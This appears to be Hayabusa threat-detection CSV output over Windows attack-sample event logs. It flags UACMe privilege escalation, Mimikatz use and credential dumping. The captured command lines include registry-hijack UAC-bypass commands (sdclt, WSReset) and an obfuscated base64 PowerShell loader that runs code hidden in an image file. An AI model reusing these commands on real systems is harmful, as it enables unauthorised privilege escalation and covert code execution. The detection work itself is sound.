16:26:33.984 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.302 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 0000028064468040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490 : Path: C:\Windows\System32\consent.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k 
netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 18:10:28.612 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: 
NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry 
Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add 
HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch 
-p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious 
Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 
21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript 